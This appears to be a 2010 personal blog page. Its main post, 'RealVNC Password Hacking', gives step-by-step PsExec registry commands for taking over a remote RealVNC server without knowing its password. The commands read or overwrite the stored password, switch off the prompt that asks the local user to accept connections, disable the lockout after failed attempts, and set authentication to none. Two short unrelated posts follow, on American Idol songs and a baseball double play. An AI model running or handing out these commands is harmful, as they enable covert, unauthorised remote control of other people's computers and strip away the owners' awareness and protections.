RealVNC Password Hacking

Posted by Darren | Posted in Programming | Posted on 04-30-2010

1

How to connect to a remote computer running RealVNC when you don’t know the password.

Query the registry for the encrypted password:
PsExec \\Remote-PC REG QUERY HKLM\Software\RealVNC\WinVNC4 /v Password

Change the password to “a”:
PsExec \\Remote-PC REG ADD HKLM\Software\RealVNC\WinVNC4 /v Password /t REG_BINARY /d d8d1e367e1d17646 /f

Can’t connect with password? Check for “Prompt local user to accept connections”:
PsExec \\Remote-PC REG QUERY HKLM\Software\RealVNC\WinVNC4 /v QueryConnect

Disable “Prompt local user to accept connections”:
PsExec \\Remote-PC REG ADD HKLM\Software\RealVNC\WinVNC4 /v QueryConnect /t REG_DWORD /d 0 /f

Disable “Too many security failures”:
PsExec \\Remote-PC REG ADD HKLM\Software\RealVNC\WinVNC4 /v BlacklistTimeout /t REG_DWORD /d 0 /f


A better way, bypass the password instead of changing it.

Set RealVNC to “No Authentication” and connect without a password:
PsExec \\Remote-PC REG ADD HKLM\Software\RealVNC\WinVNC4 /v SecurityTypes /t REG_SZ /d None /f

Change RealVNC back to “VNC Password Authentication”:
PsExec \\Remote-PC REG ADD HKLM\Software\RealVNC\WinVNC4 /v SecurityTypes /t REG_SZ /d VncAuth /f

NOTE: In this example I used RealVNC Server Free Edition v4.1.3 in Service-Mode.
Use “HKCU” if RealVNC is running in User-Mode, and “HKLM” if running in Service-Mode.
PsExec is a command line utility found in Sysinternals PsTools.

Share

MP3: American Idol – Top 6

Posted by Darren | Posted in Music | Posted on 04-29-2010

Tags:

0

American Idol – Top 6

Lee DeWyze – You’re Still the One
Mike Lynche – It Only Hurts When I Breath
Casey James – Don’t
Crystal Bowersox – No One Needs to Know Right Now
Aaron Kelly – It’s in the Way You Love Me
Siobhan Magnus – Any Man of Mine

Share

Phillies Amazing Double Play

Posted by Darren | Posted in Life in General | Posted on 04-28-2010

Tags:

0

Juan Castro makes a diving stop and flips with his glove to Chase Utley for a double play.

Share